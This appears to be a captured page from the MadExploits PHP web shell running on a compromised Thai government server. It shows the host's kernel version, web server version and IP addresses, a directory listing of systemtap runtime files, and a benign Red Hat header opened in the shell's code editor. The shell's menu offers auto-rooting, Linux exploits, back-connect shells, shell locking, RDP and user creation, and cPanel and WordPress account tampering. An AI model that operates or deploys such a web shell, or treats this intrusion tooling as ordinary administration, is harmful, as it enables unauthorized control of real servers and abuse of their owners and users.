Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
systemtap /
runtime /
transport /
[ HOME SHELL ]
Name
Size
Permission
Action
control.c
22.28
KB
-rw-r--r--
control.h
1.07
KB
-rw-r--r--
debugfs.c
1.71
KB
-rw-r--r--
procfs.c
4.36
KB
-rw-r--r--
relay_v2.c
11.63
KB
-rw-r--r--
relayfs.c
4.81
KB
-rw-r--r--
relayfs.h
609
B
-rw-r--r--
ring_buffer.c
19.58
KB
-rw-r--r--
symbols.c
14.18
KB
-rw-r--r--
transport.c
22.27
KB
-rw-r--r--
transport.h
3.38
KB
-rw-r--r--
transport_msgs.h
5.08
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : control.h
/* -*- linux-c -*- * * control channel header * Copyright (C) 2009 Red Hat Inc. * * This file is part of systemtap, and is free software. You can * redistribute it and/or modify it under the terms of the GNU General * Public License (GPL); either version 2, or (at your option) any * later version. */ #ifndef _CONTROL_H_ #define _CONTROL_H_ #include <linux/spinlock.h> #include <linux/list.h> static struct list_head _stp_ctl_ready_q; static spinlock_t _stp_ctl_ready_lock; static wait_queue_head_t _stp_ctl_wq; struct _stp_buffer { struct list_head list; int len; int type; char buf[STP_CTL_BUFFER_SIZE]; }; static struct file_operations _stp_ctl_fops_cmd; static int _stp_ctl_send(int type, void *data, unsigned len); static int _stp_ctl_send_notify(int type, void *data, unsigned len); static int _stp_ctl_write_fs(int type, void *data, unsigned len); static int _stp_register_ctl_channel(void); static void _stp_unregister_ctl_channel(void); static int _stp_register_ctl_channel_fs(void); static void _stp_unregister_ctl_channel_fs(void); #endif /* _CONTROL_H_ */
Close